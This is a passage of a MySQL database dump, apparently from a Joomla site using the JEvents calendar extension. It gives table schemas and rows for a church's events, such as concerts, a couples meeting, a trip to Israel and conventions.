(26, 7, 7, '7aece6ab7528fc564a7a59776d4e8594', '2017-02-08 17:00:00', '2017-02-11 08:00:00'),
(27, 8, 8, '7529eb6afa3a089a9b838ff3d5209686', '2017-03-17 17:00:00', '2017-03-18 20:00:00'),
(28, 9, 9, '18a4cfd18fd6e9315ba17a48be39ae5d', '2017-04-13 17:00:00', '2017-04-16 20:00:00'),
(29, 10, 10, '126f026239eb21923b74688ad15d5647', '2017-05-12 17:00:00', '2017-05-14 20:00:00'),
(30, 11, 11, '334a9449529946e4d8343963c34de949', '2017-05-01 17:00:00', '2017-05-31 20:00:00'),
(31, 12, 12, '376316936fe539900ecf1064c8002096', '2017-06-03 08:00:00', '2017-06-03 17:00:00');

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_jevents_rrule`
--

CREATE TABLE `y57u5_jevents_rrule` (
  `rr_id` int(12) NOT NULL,
  `eventid` int(12) NOT NULL DEFAULT '1',
  `freq` varchar(30) NOT NULL DEFAULT '',
  `until` int(12) NOT NULL DEFAULT '1',
  `untilraw` varchar(30) NOT NULL DEFAULT '',
  `count` int(6) NOT NULL DEFAULT '1',
  `rinterval` int(6) NOT NULL DEFAULT '1',
  `bysecond` varchar(50) NOT NULL DEFAULT '',
  `byminute` varchar(50) NOT NULL DEFAULT '',
  `byhour` varchar(50) NOT NULL DEFAULT '',
  `byday` varchar(50) NOT NULL DEFAULT '',
  `bymonthday` varchar(50) NOT NULL DEFAULT '',
  `byyearday` varchar(100) NOT NULL DEFAULT '',
  `byweekno` varchar(50) NOT NULL DEFAULT '',
  `bymonth` varchar(50) NOT NULL DEFAULT '',
  `bysetpos` varchar(50) NOT NULL DEFAULT '',
  `wkst` varchar(50) NOT NULL DEFAULT '',
  `irregulardates` text NOT NULL
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `y57u5_jevents_rrule`
--

INSERT INTO `y57u5_jevents_rrule` (`rr_id`, `eventid`, `freq`, `until`, `untilraw`, `count`, `rinterval`, `bysecond`, `byminute`, `byhour`, `byday`, `bymonthday`, `byyearday`, `byweekno`, `bymonth`, `bysetpos`, `wkst`, `irregulardates`) VALUES
(1, 1, 'none', 0, '', 1, 1, '', '', '', '+1MO,+2MO,+3MO,+4MO,+5MO', '', '', '', '', '', '', '[]'),
(2, 2, 'none', 0, '', 1, 1, '', '', '', '+1WE,+2WE,+3WE,+4WE,+5WE', '', '', '', '', '', '', '[]'),
(3, 3, 'none', 0, '', 1, 1, '', '', '', '+1TU,+2TU,+3TU,+4TU,+5TU', '', '', '', '', '', '', '[]'),
(4, 4, 'none', 0, '', 1, 1, '', '', '', '+1SU,+2SU,+3SU,+4SU,+5SU', '', '', '', '', '', '', '[]'),
(5, 5, 'none', 0, '', 1, 1, '', '', '', '+1FR,+2FR,+3FR,+4FR,+5FR', '', '', '', '', '', '', '[]'),
(6, 6, 'none', 0, '', 1, 1, '', '', '', '', '+1', '', '', '', '', '', '[]'),
(7, 7, 'none', 0, '', 1, 1, '', '', '', '+1WE,+1TH', '', '', '', '', '', '', '[]'),
(8, 8, 'none', 0, '', 1, 1, '', '', '', '+1FR', '', '', '', '', '', '', '[]'),
(9, 9, 'none', 0, '', 1, 1, '', '', '', '+1TH', '', '', '', '', '', '', '[]'),
(10, 10, 'none', 0, '', 1, 1, '', '', '', '+1FR', '', '', '', '', '', '', '[]'),
(11, 11, 'none', 0, '', 1, 1, '', '', '', '+1MO', '', '', '', '', '', '', '[]'),
(12, 12, 'none', 0, '', 1, 1, '', '', '', '+1SA', '', '', '', '', '', '', '[]');

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_jevents_translation`
--

CREATE TABLE `y57u5_jevents_translation` (
  `translation_id` int(12) NOT NULL,
  `evdet_id` int(12) NOT NULL DEFAULT '0',
  `description` longtext NOT NULL,
  `location` varchar(120) NOT NULL DEFAULT '',
  `summary` longtext NOT NULL,
  `contact` varchar(120) NOT NULL DEFAULT '',
  `extra_info` text NOT NULL,
  `language` varchar(20) NOT NULL DEFAULT '*'
) ENGINE=InnoDB DEFAULT CHARSET=utf8;

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_jevents_vevdetail`
--

CREATE TABLE `y57u5_jevents_vevdetail` (
  `evdet_id` int(12) NOT NULL,
  `rawdata` longtext NOT NULL,
  `dtstart` int(11) NOT NULL DEFAULT '0',
  `dtstartraw` varchar(30) NOT NULL DEFAULT '',
  `duration` int(11) NOT NULL DEFAULT '0',
  `durationraw` varchar(30) NOT NULL DEFAULT '',
  `dtend` int(11) NOT NULL DEFAULT '0',
  `dtendraw` varchar(30) NOT NULL DEFAULT '',
  `dtstamp` varchar(30) NOT NULL DEFAULT '',
  `class` varchar(10) NOT NULL DEFAULT '',
  `categories` varchar(120) NOT NULL DEFAULT '',
  `color` varchar(20) NOT NULL DEFAULT '',
  `description` longtext NOT NULL,
  `geolon` float NOT NULL DEFAULT '0',
  `geolat` float NOT NULL DEFAULT '0',
  `location` varchar(120) NOT NULL DEFAULT '',
  `priority` tinyint(3) UNSIGNED NOT NULL DEFAULT '0',
  `status` varchar(20) NOT NULL DEFAULT '',
  `summary` longtext NOT NULL,
  `contact` varchar(120) NOT NULL DEFAULT '',
  `organizer` varchar(120) NOT NULL DEFAULT '',
  `url` text NOT NULL,
  `extra_info` text NOT NULL,
  `created` varchar(30) NOT NULL DEFAULT '',
  `sequence` int(11) NOT NULL DEFAULT '1',
  `state` tinyint(3) NOT NULL DEFAULT '1',
  `modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `multiday` tinyint(3) NOT NULL DEFAULT '1',
  `hits` int(11) NOT NULL DEFAULT '0',
  `noendtime` tinyint(3) NOT NULL DEFAULT '0',
  `loc_id` int(11) NOT NULL DEFAULT '0'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `y57u5_jevents_vevdetail`
--

INSERT INTO `y57u5_jevents_vevdetail` (`evdet_id`, `rawdata`, `dtstart`, `dtstartraw`, `duration`, `durationraw`, `dtend`, `dtendraw`, `dtstamp`, `class`, `categories`, `color`, `description`, `geolon`, `geolat`, `location`, `priority`, `status`, `summary`, `contact`, `organizer`, `url`, `extra_info`, `created`, `sequence`, `state`, `modified`, `multiday`, `hits`, `noendtime`, `loc_id`) VALUES
(1, '', 1482390000, '', 0, '', 1482447599, '', '', '', '', '', '<p>All couples between 1-10 years of marriage are invited</p>', 0, 0, 'Jeffersonvile, Indiana', 0, '', 'Couples Meeting', '1 800 000 0000', '', '', 'All couples between 1-10 years of marriage are invited', '', 0, 1, '2016-01-15 05:53:14', 1, 40, 1, 0),
(2, '', 1479538800, '', 0, '', 1479596399, '', '', '', '', '', '', 0, 0, 'Israel', 0, '', 'Trip to Israel', 'Your local pastor', '', '', 'We are planning a two week visit to Israel and its environs. ', '', 0, 1, '2016-01-15 05:53:24', 0, 26, 1, 0),
(3, '', 1473400800, '', 0, '', 1473433200, '', '', '', '', '', '<p>All roads will lead to one stage. One crowd and one ticket per person. One band will be performing. A concert you don\'t want to miss</p>', 0, 0, 'Plenary Hall', 0, '', 'Worship Live! Concert', 'Pastor', '', '', 'All roads will lead to one stage. One crowd and one ticket per person', '', 0, 1, '2016-01-15 05:53:45', 1, 27, 0, 0),
(4, '', 1472623200, '', 0, '', 1472655600, '', '', '', '', '', '<p>All roads will lead to one stage. One crowd and one ticket per person. One band will be performing. A concert you don\'t want to miss</p>', 0, 0, 'Plenary Hall', 0, '', 'Calvary Road Concert', 'Pastor', '', '', 'All roads will lead to one stage. One crowd and one ticket per person', '', 0, 1, '2016-01-15 05:52:52', 1, 9, 0, 0),
(5, '', 1474264800, '', 0, '', 1474297200, '', '', '', '', '', '<p>Take up one idea. Make that one idea your life - think of it, dream of it, live on that idea. Let the brain, muscles, nerves, every part of your body, be full of that idea, and just leave every other idea alone. This is the way to success.</p>\r\n<p>Believe in yourself! Have faith in your abilities! Without a humble but reasonable confidence in your own powers you cannot be successful or happy. I don\'t believe you have to be better than everybody else. I believe you have to be better than you ever thought you could be.</p>', 0, 0, 'Nashvile', 0, '', 'Fully alive Concert', 'Neemah', '', '', 'Fully alive Concert by Ken Davis', '', 0, 1, '2016-01-15 05:53:35', 1, 31, 0, 0),
(6, '', 1483254000, '', 0, '', 1483272000, '', '', '', '', '', '<p>Victory Celebration Service. Step 4 of our Fasting and Prayer</p>', 0, 0, 'Dream Centre Headquarters', 0, '', 'Victory Celebration Service', '', '', '', '', '', 0, 1, '2017-01-01 16:16:17', 1, 5, 0, 0),
(7, '', 1486569600, '', 0, '', 1486796400, '', '', '', '', '', '<p>ASOM 2017.</p>', 0, 0, '', 0, '', 'Annual School of Ministry', '', '', '', '', '', 0, 1, '2017-01-01 19:43:21', 1, 9, 0, 0),
(8, '', 1489766400, '', 0, '', 1489863600, '', '', '', '', '', '', 0, 0, '', 0, '', 'All Nations Women Congress', '', '', '', '', '', 0, 1, '2017-01-01 13:43:20', 0, 4, 0, 0),
(9, '', 1492095600, '', 0, '', 1492365600, '', '', '', '', '', '<p>Easter Faith Seminar</p>', 0, 0, '', 0, '', 'Easter Faith Seminar', '', '', '', '', '', 0, 1, '2017-01-01 11:19:08', 0, 2, 0, 0),
(10, '', 1494601200, '', 0, '', 1494784800, '', '', '', '', '', '<p>Special Anniversary Weekend & Daddy\'s Birthday</p>', 0, 0, '', 0, '', 'Special Anniversary Weekend & Daddy\'s Birthday', '', '', '', '', '', 0, 1, '2017-01-01 11:20:17', 0, 0, 0, 0),
(11, '', 1493650800, '', 0, '', 1496253600, '', '', '', '', '', '', 0, 0, '', 0, '', 'School of the Calling', '', '', '', '', '', 0, 1, '2017-01-01 11:21:32', 0, 4, 0, 0),
(12, '', 1496469600, '', 0, '', 1496502000, '', '', '', '', '', '', 0, 0, '', 0, '', 'Men\'s Convention', '', '', '', '', '', 0, 1, '2017-01-01 11:22:46', 1, 0, 0, 0);

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_jevents_vevent`
--

CREATE TABLE `y57u5_jevents_vevent` (
  `ev_id` int(12) NOT NULL,
  `icsid` int(12) NOT NULL DEFAULT '0',
  `catid` int(11) NOT NULL DEFAULT '1',
  `uid` varchar(255) NOT NULL DEFAULT '',
  `refreshed` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `created_by` int(11) UNSIGNED NOT NULL DEFAULT '0',
  `created_by_alias` varchar(100) NOT NULL DEFAULT '',
  `modified_by` int(11) UNSIGNED NOT NULL DEFAULT '0',
  `rawdata` longtext NOT NULL,
  `recurrence_id` varchar(30) NOT NULL DEFAULT '',
  `detail_id` int(12) NOT NULL DEFAULT '0',
  `state` tinyint(3) NOT NULL DEFAULT '1',
  `lockevent` tinyint(3) NOT NULL DEFAULT '0',
  `author_notified` tinyint(3) NOT NULL DEFAULT '0',
  `access` int(11) UNSIGNED NOT NULL DEFAULT '0',
  `tzid` varchar(100) NOT NULL DEFAULT ''
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `y57u5_jevents_vevent`
--

INSERT INTO `y57u5_jevents_vevent` (`ev_id`, `icsid`, `catid`, `uid`, `refreshed`, `created`, `created_by`, `created_by_alias`, `modified_by`, `rawdata`, `recurrence_id`, `detail_id`, `state`, `lockevent`, `author_notified`, `access`, `tzid`) VALUES
(1, 1, 30, '414dfcccab5cebc40140af3db8ffaea8', '0000-00-00 00:00:00', '2012-09-20 16:53:43', 42, '', 42, 'a:20:{s:3:\"UID\";s:32:\"414dfcccab5cebc40140af3db8ffaea8\";s:11:\"X-EXTRAINFO\";s:54:\"All couples between 1-10 years of marriage are invited\";s:8:\"LOCATION\";s:22:\"Jeffersonvile, Indiana\";s:11:\"allDayEvent\";s:3:\"off\";s:7:\"CONTACT\";s:14:\"1 800 000 0000\";s:11:\"DESCRIPTION\";s:61:\"<p>All couples between 1-10 years of marriage are invited</p>\";s:12:\"publish_down\";s:10:\"2016-12-22\";s:10:\"publish_up\";s:10:\"2016-12-22\";s:13:\"publish_down2\";s:10:\"2016-12-22\";s:11:\"publish_up2\";s:10:\"2016-12-22\";s:7:\"SUMMARY\";s:15:\"Couples Meeting\";s:3:\"URL\";s:0:\"\";s:11:\"X-CREATEDBY\";i:42;s:7:\"DTSTART\";i:1482390000;s:5:\"DTEND\";i:1482447599;s:5:\"RRULE\";a:5:{s:4:\"FREQ\";s:4:\"none\";s:5:\"COUNT\";i:1;s:8:\"INTERVAL\";s:1:\"1\";s:14:\"IRREGULARDATES\";a:0:{}s:5:\"BYDAY\";s:24:\"+1MO,+2MO,+3MO,+4MO,+5MO\";}s:8:\"MULTIDAY\";s:1:\"1\";s:9:\"NOENDTIME\";s:1:\"1\";s:7:\"X-COLOR\";s:0:\"\";s:9:\"LOCKEVENT\";s:1:\"0\";}', '', 1, 1, 0, 0, 1, ''),
(2, 1, 30, '4de080d9737a82bee437f8f047579008', '0000-00-00 00:00:00', '2012-10-11 09:59:40', 42, '', 42, 'a:20:{s:3:\"UID\";s:32:\"4de080d9737a82bee437f8f047579008\";s:11:\"X-EXTRAINFO\";s:61:\"We are planning a two week visit to Israel and its environs. \";s:8:\"LOCATION\";s:6:\"Israel\";s:11:\"allDayEvent\";s:3:\"off\";s:7:\"CONTACT\";s:17:\"Your local pastor\";s:11:\"DESCRIPTION\";s:0:\"\";s:12:\"publish_down\";s:10:\"2016-11-19\";s:10:\"publish_up\";s:10:\"2016-11-19\";s:13:\"publish_down2\";s:10:\"2016-11-19\";s:11:\"publish_up2\";s:10:\"2016-11-19\";s:7:\"SUMMARY\";s:14:\"Trip to Israel\";s:3:\"URL\";s:0:\"\";s:11:\"X-CREATEDBY\";i:42;s:7:\"DTSTART\";i:1479538800;s:5:\"DTEND\";i:1479596399;s:5:\"RRULE\";a:5:{s:4:\"FREQ\";s:4:\"none\";s:5:\"COUNT\";i:1;s:8:\"INTERVAL\";s:1:\"1\";s:14:\"IRREGULARDATES\";a:0:{}s:5:\"BYDAY\";s:24:\"+1WE,+2WE,+3WE,+4WE,+5WE\";}s:8:\"MULTIDAY\";s:1:\"0\";s:9:\"NOENDTIME\";s:1:\"1\";s:7:\"X-COLOR\";s:0:\"\";s:9:\"LOCKEVENT\";s:1:\"0\";}', '', 2, 1, 0, 0, 1, ''),
(3, 1, 30, '367b316a1694f0eba728682e6f972ce4', '0000-00-00 00:00:00', '2012-10-11 10:03:18', 42, '', 42, 'a:20:{s:3:\"UID\";s:32:\"367b316a1694f0eba728682e6f972ce4\";s:11:\"X-EXTRAINFO\";s:69:\"All roads will lead to one stage. One crowd and one ticket per person\";s:8:\"LOCATION\";s:12:\"Plenary Hall\";s:11:\"allDayEvent\";s:3:\"off\";s:7:\"CONTACT\";s:6:\"Pastor\";s:11:\"DESCRIPTION\";s:139:\"<p>All roads will lead to one stage. One crowd and one ticket per person. One band will be performing. A concert you don\'t want to miss</p>\";s:12:\"publish_down\";s:8:\"2016-9-9\";s:10:\"publish_up\";s:8:\"2016-9-9\";s:13:\"publish_down2\";s:8:\"2016-9-9\";s:11:\"publish_up2\";s:8:\"2016-9-9\";s:7:\"SUMMARY\";s:21:\"Worship Live! Concert\";s:3:\"URL\";s:0:\"\";s:11:\"X-CREATEDBY\";i:42;s:7:\"DTSTART\";i:1473400800;s:5:\"DTEND\";i:1473433200;s:5:\"RRULE\";a:5:{s:4:\"FREQ\";s:4:\"none\";s:5:\"COUNT\";i:1;s:8:\"INTERVAL\";s:1:\"1\";s:14:\"IRREGULARDATES\";a:0:{}s:5:\"BYDAY\";s:24:\"+1TU,+2TU,+3TU,+4TU,+5TU\";}s:8:\"MULTIDAY\";s:1:\"1\";s:9:\"NOENDTIME\";s:1:\"0\";s:7:\"X-COLOR\";s:0:\"\";s:9:\"LOCKEVENT\";s:1:\"0\";}', '', 3, 1, 0, 0, 1, ''),
(4, 1, 30, 'c9f150452a0ec30d63a8ed3cb7b53b8e', '0000-00-00 00:00:00', '2014-07-26 13:22:08', 42, '', 42, 'a:20:{s:3:\"UID\";s:32:\"c9f150452a0ec30d63a8ed3cb7b53b8e\";s:11:\"X-EXTRAINFO\";s:69:\"All roads will lead to one stage. One crowd and one ticket per person\";s:8:\"LOCATION\";s:12:\"Plenary Hall\";s:11:\"allDayEvent\";s:3:\"off\";s:7:\"CONTACT\";s:6:\"Pastor\";s:11:\"DESCRIPTION\";s:139:\"<p>All roads will lead to one stage. One crowd and one ticket per person. One band will be performing. A concert you don\'t want to miss</p>\";s:12:\"publish_down\";s:9:\"2016-8-31\";s:10:\"publish_up\";s:9:\"2016-8-31\";s:13:\"publish_down2\";s:9:\"2016-8-31\";s:11:\"publish_up2\";s:9:\"2016-8-31\";s:7:\"SUMMARY\";s:20:\"Calvary Road Concert\";s:3:\"URL\";s:0:\"\";s:11:\"X-CREATEDBY\";i:42;s:7:\"DTSTART\";i:1472623200;s:5:\"DTEND\";i:1472655600;s:5:\"RRULE\";a:5:{s:4:\"FREQ\";s:4:\"none\";s:5:\"COUNT\";i:1;s:8:\"INTERVAL\";s:1:\"1\";s:14:\"IRREGULARDATES\";a:0:{}s:5:\"BYDAY\";s:24:\"+1SU,+2SU,+3SU,+4SU,+5SU\";}s:8:\"MULTIDAY\";s:1:\"1\";s:9:\"NOENDTIME\";s:1:\"0\";s:7:\"X-COLOR\";s:0:\"\";s:9:\"LOCKEVENT\";s:1:\"0\";}', '', 4, 1, 0, 0, 1, ''),
(5, 1, 30, '545620c002e76533fddd5a81efb0f095', '0000-00-00 00:00:00', '2014-07-26 13:32:02', 42, '', 42, 'a:20:{s:3:\"UID\";s:32:\"545620c002e76533fddd5a81efb0f095\";s:11:\"X-EXTRAINFO\";s:32:\"Fully alive Concert by Ken Davis\";s:8:\"LOCATION\";s:8:\"Nashvile\";s:11:\"allDayEvent\";s:3:\"off\";s:7:\"CONTACT\";s:6:\"Neemah\";s:11:\"DESCRIPTION\";s:529:\"<p>Take up one idea. Make that one idea your life - think of it, dream of it, live on that idea. Let the brain, muscles, nerves, every part of your body, be full of that idea, and just leave every other idea alone. This is the way to success.</p>\r\n<p>Believe in yourself! Have faith in your abilities! Without a humble but reasonable confidence in your own powers you cannot be successful or happy. I don\'t believe you have to be better than everybody else. I believe you have to be better than you ever thought you could be.</p>\";s:12:\"publish_down\";s:9:\"2016-9-19\";s:10:\"publish_up\";s:9:\"2016-9-19\";s:13:\"publish_down2\";s:9:\"2016-9-19\";s:11:\"publish_up2\";s:9:\"2016-9-19\";s:7:\"SUMMARY\";s:19:\"Fully alive Concert\";s:3:\"URL\";s:0:\"\";s:11:\"X-CREATEDBY\";i:42;s:7:\"DTSTART\";i:1474264800;s:5:\"DTEND\";i:1474297200;s:5:\"RRULE\";a:5:{s:4:\"FREQ\";s:4:\"none\";s:5:\"COUNT\";i:1;s:8:\"INTERVAL\";s:1:\"1\";s:14:\"IRREGULARDATES\";a:0:{}s:5:\"BYDAY\";s:24:\"+1FR,+2FR,+3FR,+4FR,+5FR\";}s:8:\"MULTIDAY\";s:1:\"1\";s:9:\"NOENDTIME\";s:1:\"0\";s:7:\"X-COLOR\";s:0:\"\";s:9:\"LOCKEVENT\";s:1:\"0\";}', '', 5, 1, 0, 0, 1, ''),
(6, 1, 38, 'f803ffc8c1ef5b4bc6b6cdffb5ac6f95', '0000-00-00 00:00:00', '2017-01-01 11:06:16', 196, '', 196, 'a:20:{s:3:\"UID\";s:32:\"f803ffc8c1ef5b4bc6b6cdffb5ac6f95\";s:11:\"X-EXTRAINFO\";s:0:\"\";s:8:\"LOCATION\";s:25:\"Dream Centre Headquarters\";s:11:\"allDayEvent\";s:3:\"off\";s:7:\"CONTACT\";s:0:\"\";s:11:\"DESCRIPTION\";s:68:\"<p>Victory Celebration Service. Step 4 of our Fasting and Prayer</p>\";s:12:\"publish_down\";s:8:\"2017-1-1\";s:10:\"publish_up\";s:8:\"2017-1-1\";s:13:\"publish_down2\";s:8:\"2017-1-1\";s:11:\"publish_up2\";s:8:\"2017-1-1\";s:7:\"SUMMARY\";s:27:\"Victory Celebration Service\";s:3:\"URL\";s:0:\"\";s:11:\"X-CREATEDBY\";i:196;s:7:\"DTSTART\";i:1483254000;s:5:\"DTEND\";i:1483272000;s:5:\"RRULE\";a:5:{s:4:\"FREQ\";s:4:\"none\";s:5:\"COUNT\";i:1;s:8:\"INTERVAL\";s:1:\"1\";s:14:\"IRREGULARDATES\";a:0:{}s:10:\"BYMONTHDAY\";s:2:\"+1\";}s:8:\"MULTIDAY\";s:1:\"1\";s:9:\"NOENDTIME\";s:1:\"0\";s:7:\"X-COLOR\";s:0:\"\";s:9:\"LOCKEVENT\";s:1:\"0\";}', '', 6, 1, 0, 0, 1, ''),
(7, 1, 30, '816b5e5f19e81969662facfe8dc8982e', '0000-00-00 00:00:00', '2017-01-01 11:11:47', 196, '', 196, 'a:20:{s:3:\"UID\";s:32:\"816b5e5f19e81969662facfe8dc8982e\";s:11:\"X-EXTRAINFO\";s:0:\"\";s:8:\"LOCATION\";s:0:\"\";s:11:\"allDayEvent\";s:3:\"off\";s:7:\"CONTACT\";s:0:\"\";s:11:\"DESCRIPTION\";s:17:\"<p>ASOM 2017.</p>\";s:12:\"publish_down\";s:9:\"2017-2-11\";s:10:\"publish_up\";s:8:\"2017-2-8\";s:13:\"publish_down2\";s:9:\"2017-2-11\";s:11:\"publish_up2\";s:8:\"2017-2-8\";s:7:\"SUMMARY\";s:25:\"Annual School of Ministry\";s:3:\"URL\";s:0:\"\";s:11:\"X-CREATEDBY\";i:196;s:7:\"DTSTART\";i:1486569600;s:5:\"DTEND\";i:1486796400;s:5:\"RRULE\";a:5:{s:4:\"FREQ\";s:4:\"none\";s:5:\"COUNT\";i:1;s:8:\"INTERVAL\";s:1:\"1\";s:14:\"IRREGULARDATES\";a:0:{}s:5:\"BYDAY\";s:9:\"+1WE,+1TH\";}s:8:\"MULTIDAY\";s:1:\"1\";s:9:\"NOENDTIME\";s:1:\"0\";s:7:\"X-COLOR\";s:0:\"\";s:9:\"LOCKEVENT\";s:1:\"0\";}', '', 7, 1, 0, 0, 1, ''),
(8, 1, 38, 'eaf961b4b341d58ee9dd1e9e88a8a799', '0000-00-00 00:00:00', '2017-01-01 11:15:14', 196, '', 196, 'a:20:{s:3:\"UID\";s:32:\"eaf961b4b341d58ee9dd1e9e88a8a799\";s:11:\"X-EXTRAINFO\";s:0:\"\";s:8:\"LOCATION\";s:0:\"\";s:11:\"allDayEvent\";s:3:\"off\";s:7:\"CONTACT\";s:0:\"\";s:11:\"DESCRIPTION\";s:0:\"\";s:12:\"publish_down\";s:9:\"2017-3-18\";s:10:\"publish_up\";s:9:\"2017-3-17\";s:13:\"publish_down2\";s:9:\"2017-3-18\";s:11:\"publish_up2\";s:9:\"2017-3-17\";s:7:\"SUMMARY\";s:26:\"All Nations Women Congress\";s:3:\"URL\";s:0:\"\";s:11:\"X-CREATEDBY\";i:196;s:7:\"DTSTART\";i:1489766400;s:5:\"DTEND\";i:1489863600;s:5:\"RRULE\";a:5:{s:4:\"FREQ\";s:4:\"none\";s:5:\"COUNT\";i:1;s:8:\"INTERVAL\";s:1:\"1\";s:14:\"IRREGULARDATES\";a:0:{}s:5:\"BYDAY\";s:4:\"+1FR\";}s:8:\"MULTIDAY\";s:1:\"0\";s:9:\"NOENDTIME\";s:1:\"0\";s:7:\"X-COLOR\";s:0:\"\";s:9:\"LOCKEVENT\";s:1:\"0\";}', '', 8, 1, 0, 0, 1, ''),
(9, 1, 38, 'e085840ba8783cb9fe105529134675b9', '0000-00-00 00:00:00', '2017-01-01 11:18:37', 196, '', 196, 'a:20:{s:3:\"UID\";s:32:\"e085840ba8783cb9fe105529134675b9\";s:11:\"X-EXTRAINFO\";s:0:\"\";s:8:\"LOCATION\";s:0:\"\";s:11:\"allDayEvent\";s:3:\"off\";s:7:\"CONTACT\";s:0:\"\";s:11:\"DESCRIPTION\";s:27:\"<p>Easter Faith Seminar</p>\";s:12:\"publish_down\";s:9:\"2017-4-16\";s:10:\"publish_up\";s:9:\"2017-4-13\";s:13:\"publish_down2\";s:9:\"2017-4-16\";s:11:\"publish_up2\";s:9:\"2017-4-13\";s:7:\"SUMMARY\";s:20:\"Easter Faith Seminar\";s:3:\"URL\";s:0:\"\";s:11:\"X-CREATEDBY\";i:196;s:7:\"DTSTART\";i:1492095600;s:5:\"DTEND\";i:1492365600;s:5:\"RRULE\";a:5:{s:4:\"FREQ\";s:4:\"none\";s:5:\"COUNT\";i:1;s:8:\"INTERVAL\";s:1:\"1\";s:14:\"IRREGULARDATES\";a:0:{}s:5:\"BYDAY\";s:4:\"+1TH\";}s:8:\"MULTIDAY\";s:1:\"0\";s:9:\"NOENDTIME\";s:1:\"0\";s:7:\"X-COLOR\";s:0:\"\";s:9:\"LOCKEVENT\";s:1:\"0\";}', '', 9, 1, 0, 0, 1, ''),
(10, 1, 38, 'a2f97332f415e1cd34b8db5c276f283a', '0000-00-00 00:00:00', '2017-01-01 11:20:00', 196, '', 196, 'a:20:{s:3:\"UID\";s:32:\"a2f97332f415e1cd34b8db5c276f283a\";s:11:\"X-EXTRAINFO\";s:0:\"\";s:8:\"LOCATION\";s:0:\"\";s:11:\"allDayEvent\";s:3:\"off\";s:7:\"CONTACT\";s:0:\"\";s:11:\"DESCRIPTION\";s:53:\"<p>Special Anniversary Weekend & Daddy\'s Birthday</p>\";s:12:\"publish_down\";s:9:\"2017-5-14\";s:10:\"publish_up\";s:9:\"2017-5-12\";s:13:\"publish_down2\";s:9:\"2017-5-14\";s:11:\"publish_up2\";s:9:\"2017-5-12\";s:7:\"SUMMARY\";s:46:\"Special Anniversary Weekend & Daddy\'s Birthday\";s:3:\"URL\";s:0:\"\";s:11:\"X-CREATEDBY\";i:196;s:7:\"DTSTART\";i:1494601200;s:5:\"DTEND\";i:1494784800;s:5:\"RRULE\";a:5:{s:4:\"FREQ\";s:4:\"none\";s:5:\"COUNT\";i:1;s:8:\"INTERVAL\";s:1:\"1\";s:14:\"IRREGULARDATES\";a:0:{}s:5:\"BYDAY\";s:4:\"+1FR\";}s:8:\"MULTIDAY\";s:1:\"0\";s:9:\"NOENDTIME\";s:1:\"0\";s:7:\"X-COLOR\";s:0:\"\";s:9:\"LOCKEVENT\";s:1:\"0\";}', '', 10, 1, 0, 0, 1, ''),
(11, 1, 38, '2d361f04ba2ec7090ed832d0129279ab', '0000-00-00 00:00:00', '2017-01-01 11:21:15', 196, '', 196, 'a:20:{s:3:\"UID\";s:32:\"2d361f04ba2ec7090ed832d0129279ab\";s:11:\"X-EXTRAINFO\";s:0:\"\";s:8:\"LOCATION\";s:0:\"\";s:11:\"allDayEvent\";s:3:\"off\";s:7:\"CONTACT\";s:0:\"\";s:11:\"DESCRIPTION\";s:0:\"\";s:12:\"publish_down\";s:9:\"2017-5-31\";s:10:\"publish_up\";s:8:\"2017-5-1\";s:13:\"publish_down2\";s:9:\"2017-5-31\";s:11:\"publish_up2\";s:8:\"2017-5-1\";s:7:\"SUMMARY\";s:21:\"School of the Calling\";s:3:\"URL\";s:0:\"\";s:11:\"X-CREATEDBY\";i:196;s:7:\"DTSTART\";i:1493650800;s:5:\"DTEND\";i:1496253600;s:5:\"RRULE\";a:5:{s:4:\"FREQ\";s:4:\"none\";s:5:\"COUNT\";i:1;s:8:\"INTERVAL\";s:1:\"1\";s:14:\"IRREGULARDATES\";a:0:{}s:5:\"BYDAY\";s:4:\"+1MO\";}s:8:\"MULTIDAY\";s:1:\"0\";s:9:\"NOENDTIME\";s:1:\"0\";s:7:\"X-COLOR\";s:0:\"\";s:9:\"LOCKEVENT\";s:1:\"0\";}', '', 11, 1, 0, 0, 1, ''),
(12, 1, 38, '30b5dbb18d7e25fa3b8577a50897d27f', '0000-00-00 00:00:00', '2017-01-01 11:22:40', 196, '', 196, 'a:20:{s:3:\"UID\";s:32:\"30b5dbb18d7e25fa3b8577a50897d27f\";s:11:\"X-EXTRAINFO\";s:0:\"\";s:8:\"LOCATION\";s:0:\"\";s:11:\"allDayEvent\";s:3:\"off\";s:7:\"CONTACT\";s:0:\"\";s:11:\"DESCRIPTION\";s:0:\"\";s:12:\"publish_down\";s:8:\"2017-6-3\";s:10:\"publish_up\";s:8:\"2017-6-3\";s:13:\"publish_down2\";s:8:\"2017-6-3\";s:11:\"publish_up2\";s:8:\"2017-6-3\";s:7:\"SUMMARY\";s:16:\"Men\'s Convention\";s:3:\"URL\";s:0:\"\";s:11:\"X-CREATEDBY\";i:196;s:7:\"DTSTART\";i:1496469600;s:5:\"DTEND\";i:1496502000;s:5:\"RRULE\";a:5:{s:4:\"FREQ\";s:4:\"none\";s:5:\"COUNT\";i:1;s:8:\"INTERVAL\";s:1:\"1\";s:14:\"IRREGULARDATES\";a:0:{}s:5:\"BYDAY\";s:4:\"+1SA\";}s:8:\"MULTIDAY\";s:1:\"1\";s:9:\"NOENDTIME\";s:1:\"0\";s:7:\"X-COLOR\";s:0:\"\";s:9:\"LOCKEVENT\";s:1:\"0\";}', '', 12, 1, 0, 0, 1, '');

-- --------------------------------------------------------

--
-- Table structure for table `y57u5_jev_defaults`
--

CREATE TABLE `y57u5_jev_defaults` (
  `id` int(11) UNSIGNED NOT NULL,
  `title` varchar(100) NOT NULL DEFAULT '',
  `name` varchar(50) NOT NULL DEFAULT '',
  `subject` text NOT NULL,
  `value` text NOT NULL,
  `state` tinyint(3) NOT NULL DEFAULT '1',
  `params` text NOT NULL,
  `language` varchar(20) NOT NULL DEFAULT '*',
  `catid` int(11) NOT NULL DEFAULT '0'
) ENGINE=MyISAM DEFAULT CHARSET=utf8;

--
-- Dumping data for table `y57u5_jev_defaults`
--

